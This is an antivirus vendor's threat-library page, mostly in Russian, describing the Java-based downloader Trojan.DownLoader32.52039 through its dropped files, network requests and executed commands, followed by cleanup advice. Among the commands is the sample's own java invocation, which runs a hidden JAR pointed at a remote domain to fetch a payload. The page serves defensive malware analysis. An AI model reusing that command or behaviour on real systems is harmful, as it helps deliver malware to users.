Защити созданное

Другие наши ресурсы

  • free.drweb.kz — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.kz — сетевая лечащая утилита Dr.Web CureNet!
Закрыть

Библиотека
Моя библиотека

Чтобы добавить ресурс в библиотеку, войдите в аккаунт.

+ Добавить в библиотеку

Ресурсов: -

Последний: -

Моя библиотека

Поддержка
Круглосуточная поддержка | Правила обращения

Позвоните

Глобальная поддержка:
+7 (495) 789-45-86

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Глобальная поддержка:
+7 (495) 789-45-86

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.DownLoader32.52039

Добавлен в вирусную базу Dr.Web: 2020-01-24

Описание добавлено:

Technical Information

Malicious functions
Executes the following
  • '<SYSTEM32>\taskkill.exe' /F /IM chromedriver.exe
Modifies file system
Creates the following files
  • %TEMP%\imageio5013714944855563141.tmp
  • <Current directory>\libraries\joda-money-1.0.1.jar
  • %TEMP%\7658678683716882394\libraries\commons-beanutils-1.9.2.jar
  • %TEMP%\7658678683716882394\libraries\commons-digester-1.8.1.jar
  • %TEMP%\7658678683716882394\libraries\discord-rpc-release-v3.4.0.jar
  • %TEMP%\7658678683716882394\libraries\activation-1.1.jar
  • <Current directory>\libraries\jide-oss-3.6.18.jar
  • %TEMP%\7658678683716882394\libraries\joda-money-1.0.1.jar
  • <Current directory>\libraries\rsyntaxtextarea-3.0.0.jar
  • <Current directory>\libraries\jna-5.5.0.jar
  • %TEMP%\7658678683716882394\libraries\spring-jcl-5.2.3.release.jar
  • %TEMP%\7658678683716882394\libraries\jnativehook-2.1.0.jar
  • %TEMP%\7658678683716882394\libraries\jansi-1.18.jar
  • <Current directory>\libraries\commons-lang3-3.9.jar
  • <Current directory>\libraries\commons-codec-1.14.jar
  • %TEMP%\7658678683716882394\libraries\sevenzipjbinding-windows-amd64-16.02-2.01beta.jar
  • %TEMP%\7658678683716882394\libraries\spring-core-5.2.3.release.jar
  • %TEMP%\7658678683716882394\libraries\commons-lang3-3.9.jar
  • %TEMP%\7658678683716882394\libraries\commons-codec-1.14.jar
  • %TEMP%\7658678683716882394\libraries\jsoup-1.12.1.jar
  • <Current directory>\libraries\zip4j-2.3.0.jar
  • <Current directory>\libraries\forms_rt-7.0.3.jar
  • %TEMP%\7658678683716882394\libraries\zip4j-2.3.0.jar
  • <Current directory>\libraries\jna-platform-5.5.0.jar
  • <Current directory>\libraries\asm-commons-3.0.jar
  • <Current directory>\libraries\jsoup-1.12.1.jar
  • <Current directory>\libraries\javax.mail-1.6.2.jar
  • <Current directory>\libraries\activation-1.1.jar
  • <Current directory>\libraries\jnativehook-2.1.0.jar
  • %TEMP%\7658678683716882394\libraries\checker-qual-2.10.0.jar
  • <Current directory>\libraries\sevenzipjbinding-windows-x86-16.02-2.01beta.jar
  • <Current directory>\libraries\log4j-api-2.13.0.jar
  • %TEMP%\7658678683716882394\libraries\javax.activation-1.2.0.jar
  • <Current directory>\libraries\sevenzipjbinding-16.02-2.01beta.jar
  • <Current directory>\libraries\commons-io-2.6.jar
  • <Current directory>\libraries\sevenzipjbinding-windows-amd64-16.02-2.01beta.jar
  • <Current directory>\libraries\log4j-core-2.13.0.jar
  • %TEMP%\7658678683716882394\libraries\netty-codec-http-4.1.42.final.jar
  • <Current directory>\libraries\json-io-4.12.0.jar
  • %TEMP%\7658678683716882394\libraries\error_prone_annotations-2.3.4.jar
  • <Current directory>\libraries\jansi-1.18.jar
  • %TEMP%\7658678683716882394\libraries\jsr305-3.0.2.jar
  • <Current directory>\libraries\commons-validator-1.6.jar
  • %TEMP%\7658678683716882394\libraries\sevenzipjbinding-16.02-2.01beta.jar
  • <Current directory>\libraries\commons-collections-3.2.2.jar
  • %TEMP%\7658678683716882394\libraries\json-io-4.12.0.jar
  • <Current directory>\libraries\commons-beanutils-1.9.2.jar
  • %TEMP%\7658678683716882394\libraries\commons-validator-1.6.jar
  • <Current directory>\libraries\commons-digester-1.8.1.jar
  • %TEMP%\7658678683716882394\libraries\log4j-api-2.13.0.jar
  • %TEMP%\7658678683716882394\libraries\commons-io-2.6.jar
  • <Current directory>\libraries\spring-core-5.2.3.release.jar
  • %TEMP%\7658678683716882394\libraries\selenium-support-4.0.0-alpha-4.jar
  • <Current directory>\libraries\spring-jcl-5.2.3.release.jar
  • %TEMP%\7658678683716882394\libraries\kotlin-stdlib-1.3.61.jar
  • <Current directory>\libraries\jsr305-3.0.2.jar
  • %TEMP%\7658678683716882394\libraries\javax.mail-1.6.2.jar
  • %TEMP%\7658678683716882394\libraries\forms-1.1-preview.jar
  • %TEMP%\7658678683716882394\libraries\commons-net-3.6.jar
  • %TEMP%\7658678683716882394\libraries\bcprov-jdk15on-1.64.jar
  • %TEMP%\7658678683716882394\libraries\bcpkix-jdk15on-1.64.jar
  • %TEMP%\7658678683716882394\libraries\sqlite-jdbc-3.30.1.jar
  • <Current directory>\logs\2020-01-24.log
  • %TEMP%\7658678683716882394\webdrivers\chromedriver_win32.zip
  • %TEMP%\jna-3599307\jna268922695045553072.dll
  • %TEMP%\2454693197473974244\duel-trial-start8307570087688604379.png
  • %TEMP%\2454693197473974244\duel-trial-gem497877783248043343.png
  • %TEMP%\2454693197473974244\duel-trial-loaner-deck7262122022778234746.png
  • %TEMP%\7658678683716882394\libraries\rsyntaxtextarea-3.0.0.jar
  • %TEMP%\7658678683716882394\libraries\byte-buddy-1.10.6.jar
  • %TEMP%\2454693197473974244\duel-trial-level-15818294007526112013.png
  • %TEMP%\2454693197473974244\duel-trial-tour-guide842019469082354459.png
  • %TEMP%\2454693197473974244\enter-duel-trials583235389396646910.png
  • %TEMP%\2454693197473974244\standard-duelists-not-spawned7673723550835795027.png
  • %TEMP%\2454693197473974244\use-duel-orbs-button773089824438227432.png
  • %TEMP%\2454693197473974244\use-duel-orbs-text4870349708001037772.png
  • %TEMP%\2454693197473974244\roaming-duelist-spawn1154176803798425212.png
  • %TEMP%\2454693197473974244\duel-world-letter5474483655913396094.png
  • %TEMP%\2454693197473974244\rescue-complete1785919547111350573.png
  • %TEMP%\2454693197473974244\support-items1038328885823682123.png
  • %TEMP%\2454693197473974244\challenge-tickets6499875003762628275.png
  • %TEMP%\2454693197473974244\duel-trial-level-22860132188321755343.png
  • %TEMP%\2454693197473974244\duel-trial-level-31221439839836044111.png
  • %TEMP%\7658678683716882394\libraries\log4j-core-2.13.0.jar
  • %TEMP%\7658678683716882394\libraries\guava-28.2-jre.jar
  • <Current directory>\libraries\netty-codec-dns-4.1.42.final.jar
  • <Current directory>\libraries\jdom-1.0.jar
  • %TEMP%\7658678683716882394\libraries\commons-collections-3.2.2.jar
  • %TEMP%\7658678683716882394\libraries\forms_rt-7.0.3.jar
  • <Current directory>\libraries\pecoff4j-0.0.2.1.jar
  • <Current directory>\libraries\opencv-4.1.2.jar
  • <Current directory>\libraries\capstone-3.0.5-rc2.jar
  • %TEMP%\7658678683716882394\libraries\asm-tree-3.0.jar
  • <Current directory>\libraries\asm-3.0.jar
  • <Current directory>\libraries\sqlite-jdbc-3.30.1.jar
  • %TEMP%\7658678683716882394\libraries\pecoff4j-0.0.2.1.jar
  • %TEMP%\7658678683716882394\libraries\jdom-1.0.jar
  • <Current directory>\libraries\bcprov-jdk15on-1.64.jar
  • %TEMP%\7658678683716882394\libraries\capstone-3.0.5-rc2.jar
  • <Current directory>\libraries\json-20190722.jar
  • %TEMP%\7658678683716882394\libraries\json-20190722.jar
  • <Current directory>\libraries\commons-net-3.6.jar
  • %TEMP%\7658678683716882394\libraries\sevenzipjbinding-windows-x86-16.02-2.01beta.jar
  • %TEMP%\7658678683716882394\libraries\commons-math3-3.6.1.jar
  • %TEMP%\7658678683716882394\libraries\jide-oss-3.6.18.jar
  • %TEMP%\7658678683716882394\libraries\jna-5.5.0.jar
  • %TEMP%\7658678683716882394\libraries\opencv-4.1.2.jar
  • %TEMP%\7658678683716882394\libraries\jna-platform-5.5.0.jar
  • %TEMP%\7658678683716882394\libraries\asm-3.0.jar
  • <Current directory>\libraries\asm-tree-3.0.jar
  • %TEMP%\7658678683716882394\libraries\asm-commons-3.0.jar
  • <Current directory>\libraries\forms-1.1-preview.jar
  • %TEMP%\7658678683716882394\libraries\netty-codec-socks-4.1.42.final.jar
  • <Current directory>\libraries\error_prone_annotations-2.3.4.jar
  • %TEMP%\7658678683716882394\libraries\j2objc-annotations-1.3.jar
  • %TEMP%\7658678683716882394\libraries\selenium-edgehtml-driver-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\selenium-edge-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\kotlin-stdlib-common-1.3.50.jar
  • <Current directory>\libraries\okio-2.4.1.jar
  • %TEMP%\7658678683716882394\libraries\selenium-http-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\selenium-ie-driver-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\selenium-opera-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\okhttp-4.3.0.jar
  • %TEMP%\7658678683716882394\libraries\selenium-json-4.0.0-alpha-4.jar
  • <Current directory>\libraries\selenium-opera-driver-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\selenium-api-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\auto-common-0.10.jar
  • <Current directory>\libraries\kotlin-stdlib-1.3.61.jar
  • %TEMP%\7658678683716882394\libraries\httpcore-4.4.13.jar
  • <Current directory>\libraries\netty-transport-4.1.43.final.jar
  • <Current directory>\libraries\annotations-13.0.jar
  • <Current directory>\libraries\netty-reactive-streams-2.0.4.jar
  • <Current directory>\libraries\netty-buffer-4.1.43.final.jar
  • <Current directory>\libraries\netty-common-4.1.43.final.jar
  • %TEMP%\7658678683716882394\libraries\kotlin-stdlib-common-1.3.50.jar
  • <Current directory>\libraries\netty-codec-4.1.43.final.jar
  • %TEMP%\7658678683716882394\libraries\annotations-13.0.jar
  • <Current directory>\libraries\selenium-remote-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\selenium-firefox-xpi-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\netty-handler-4.1.43.final.jar
  • <Current directory>\libraries\selenium-edge-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\selenium-edgehtml-driver-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\5644451975387943554
  • <Current directory>\libraries\nuprocess-1.2.6.jar
  • %TEMP%\7658678683716882394\libraries\nuprocess-1.2.6.jar
  • <Current directory>\libraries\selenium-java-4.0.0-alpha-4.jar
  • <Current directory>\libraries\commons-logging-1.2.jar
  • <Current directory>\libraries\httpcore-4.4.13.jar
  • <Current directory>\libraries\httpclient-4.5.11.jar
  • <Current directory>\libraries\selenium-chrome-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\selenium-chromium-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\auto-service-1.0-rc6.jar
  • <Current directory>\libraries\auto-service-annotations-1.0-rc6.jar
  • <Current directory>\libraries\selenium-api-4.0.0-alpha-4.jar
  • %TEMP%\imageio3888503633650209366.tmp
  • %TEMP%\7658678683716882394\libraries\selenium-java-4.0.0-alpha-4.jar
  • <Current directory>\libraries\selenium-firefox-driver-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\selenium-chromium-driver-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\selenium-chrome-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\selenium-devtools-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\auto-service-1.0-rc6.jar
  • %TEMP%\7658678683716882394\libraries\auto-service-annotations-1.0-rc6.jar
  • %TEMP%\7658678683716882394\libraries\selenium-firefox-driver-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\commons-logging-1.2.jar
  • <Current directory>\libraries\selenium-json-4.0.0-alpha-4.jar
  • <Current directory>\libraries\selenium-http-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\okio-2.4.1.jar
  • <Current directory>\libraries\auto-common-0.10.jar
  • %TEMP%\7658678683716882394\libraries\netty-reactive-streams-2.0.4.jar
  • <Current directory>\libraries\selenium-ie-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\opentracing-api-0.33.0.jar
  • %TEMP%\7658678683716882394\libraries\netty-transport-native-epoll-4.1.42.final-linux-x86_64.jar
  • <Current directory>\libraries\listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar
  • <Current directory>\libraries\failureaccess-1.0.1.jar
  • %TEMP%\7658678683716882394\libraries\netty-codec-dns-4.1.42.final.jar
  • %TEMP%\7658678683716882394\libraries\netty-transport-native-unix-common-4.1.42.final.jar
  • <Current directory>\libraries\guava-28.2-jre.jar
  • %TEMP%\7658678683716882394\libraries\selenium-devtools-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\selenium-safari-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\netty-codec-socks-4.1.42.final.jar
  • %TEMP%\7658678683716882394\libraries\listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar
  • %TEMP%\7658678683716882394\libraries\commons-exec-1.3.jar
  • %TEMP%\7658678683716882394\libraries\failureaccess-1.0.1.jar
  • <Current directory>\libraries\checker-qual-2.10.0.jar
  • <Current directory>\libraries\j2objc-annotations-1.3.jar
  • <Current directory>\libraries\slf4j-api-1.7.21.jar
  • <Current directory>\libraries\jcabi-log-0.18.1.jar
  • <Current directory>\libraries\commons-math3-3.6.1.jar
  • <Current directory>\libraries\javax.activation-1.2.0.jar
  • <Current directory>\libraries\java-discord-rpc-2.0.2.jar
  • <Current directory>\libraries\discord-rpc-release-v3.4.0.jar
  • %TEMP%\7658678683716882394\libraries\slf4j-api-1.7.21.jar
  • <Current directory>\libraries\selenium-support-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\java-discord-rpc-2.0.2.jar
  • %TEMP%\7658678683716882394\libraries\jcabi-log-0.18.1.jar
  • <Current directory>\libraries\selenium-safari-driver-4.0.0-alpha-4.jar
  • %TEMP%\7658678683716882394\libraries\opentracing-api-0.33.0.jar
  • %TEMP%\7658678683716882394\libraries\netty-handler-proxy-4.1.42.final.jar
  • <Current directory>\libraries\bcpkix-jdk15on-1.64.jar
  • %TEMP%\2454693197473974244\global-chat7839664246124809995.png
  • <Current directory>\libraries\netty-handler-proxy-4.1.42.final.jar
  • <Current directory>\libraries\reactive-streams-1.0.3.jar
  • %TEMP%\7658678683716882394\libraries\netty-codec-4.1.43.final.jar
  • <Current directory>\libraries\async-http-client-2.10.4.jar
  • <Current directory>\libraries\async-http-client-netty-utils-2.10.4.jar
  • %TEMP%\7658678683716882394\libraries\httpclient-4.5.11.jar
  • %TEMP%\7658678683716882394\libraries\reactive-streams-1.0.3.jar
  • %TEMP%\7658678683716882394\libraries\async-http-client-netty-utils-2.10.4.jar
  • %TEMP%\7658678683716882394\libraries\netty-buffer-4.1.43.final.jar
  • %TEMP%\7658678683716882394\libraries\netty-transport-4.1.43.final.jar
  • %TEMP%\7658678683716882394\libraries\selenium-remote-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\commons-exec-1.3.jar
  • <Current directory>\libraries\byte-buddy-1.10.6.jar
  • %TEMP%\7658678683716882394\libraries\selenium-firefox-xpi-driver-4.0.0-alpha-4.jar
  • <Current directory>\libraries\netty-resolver-dns-4.1.42.final.jar
  • %TEMP%\7658678683716882394\libraries\async-http-client-2.10.4.jar
  • %TEMP%\7658678683716882394\libraries\netty-common-4.1.43.final.jar
  • <Current directory>\libraries\netty-transport-native-epoll-4.1.42.final-linux-x86_64.jar
  • <Current directory>\libraries\netty-codec-http-4.1.42.final.jar
  • %TEMP%\7658678683716882394\libraries\okhttp-4.3.0.jar
  • %TEMP%\7658678683716882394\libraries\netty-resolver-dns-4.1.42.final.jar
  • <Current directory>\libraries\netty-resolver-4.1.42.final.jar
  • %TEMP%\7658678683716882394\libraries\netty-handler-4.1.43.final.jar
  • %TEMP%\7658678683716882394\libraries\netty-transport-native-kqueue-4.1.42.final-osx-x86_64.jar
  • %TEMP%\7658678683716882394\libraries\netty-resolver-4.1.42.final.jar
  • <Current directory>\libraries\netty-transport-native-kqueue-4.1.42.final-osx-x86_64.jar
  • <Current directory>\libraries\netty-transport-native-unix-common-4.1.42.final.jar
  • %TEMP%\unzip-directory2968032918758527394\chromedriver.exe
Sets the 'hidden' attribute to the following files
  • %TEMP%\7658678683716882394\5644451975387943554
Deletes the following files
  • %TEMP%\imageio5013714944855563141.tmp
  • %TEMP%\imageio3888503633650209366.tmp
  • %TEMP%\jna-3599307\jna268922695045553072.dll
  • %TEMP%\unzip-directory2968032918758527394\chromedriver.exe
  • %TEMP%\7658678683716882394\webdrivers\chromedriver_win32.zip
Network activity
TCP
HTTP GET requests
  • http://ch#####.amazonaws.com/
  • http://ch########er.storage.googleapis.com/LATEST_RELEASE
  • http://ch########er.storage.googleapis.com/79.0.3945.36/chromedriver_win32.zip
  • 'google.com':443
  • 'pa###bin.com':443
  • 'bu#####iplaza.website':443
  • UDP
    • DNS ASK google.com
    • DNS ASK pa###bin.com
    • DNS ASK ch#####.amazonaws.com
    • DNS ASK bu#####iplaza.website
    • DNS ASK ch########er.storage.googleapis.com
    Miscellaneous
    Searches for the following windows
    • ClassName: '' WindowName: ''
    Executes the following
    • '%ProgramFiles%\java\jre1.8.0_45\bin\java.exe' -jar "<Full path to file>"
    • '%ProgramFiles%\java\jre1.8.0_45\bin\java.exe' -cp %TEMP%\7658678683716882394\libraries\* -Dfile.encoding=UTF-8 -jar %TEMP%\7658678683716882394\5644451975387943554 bullywiiplaza.website/jdlb bullywiiplaza.website/l.zip <Current directory>
    • '%ProgramFiles%\java\jre1.8.0_45\bin\java.exe' -version
    • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\wbem\wmic OS get OSArchitecture
    • '<SYSTEM32>\wbem\wmic.exe' OS get OSArchitecture

    Рекомендации по лечению

    1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
    2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
    Скачать Dr.Web

    По серийному номеру

    Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

    На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

    Скачать Dr.Web

    По серийному номеру

    1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
    2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
      • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
      • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
      • выключите устройство и включите его в обычном режиме.

    Подробнее о Dr.Web для Android

    Демо бесплатно на 14 дней

    Выдаётся при установке